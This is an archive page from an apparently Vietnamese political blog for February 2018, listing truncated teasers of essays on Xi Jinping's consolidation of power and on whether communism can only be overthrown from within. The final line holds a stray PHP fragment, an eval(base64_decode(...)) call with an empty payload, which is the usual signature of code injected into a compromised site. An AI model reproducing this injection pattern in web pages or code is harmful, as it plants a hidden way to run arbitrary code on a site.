Archive for February, 2018

TẬP CẬN BÌNH VÀ “BẪY THUCYDIDES”

TẬP CẬN BÌNH VÀ “BẪY THUCYDIDES”

Việc Tập Cận Bình vừa công khai ý định đưa Trung Cộng trở lại thời Mao, tức một người trị muôn người, cho thấy tham vọng làm vua của y mà báo chí quốc tế phân tích sau đại hội CSTQ lần thứ 19 đã thành sự thật. Con đường đi

02.27.2018 | Tiểu Luận- Chính Luận |

No Comments

CHỈ CS MỚI LẬT ĐỔ ĐƯỢC CS?

CHỈ CS MỚI LẬT ĐỔ ĐƯỢC CS?

Thời gian vừa qua, các phong trào xã hội, phong trào dân chủ tại Việt Nam chịu đựng sự đàn áp khốc liệt của giới cầm quyền CS. Không gian bị thu hẹp. Phần lớn các lãnh đạo phong trào đều bị bắt. Một số bị xét xử với những bả

02.12.2018 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>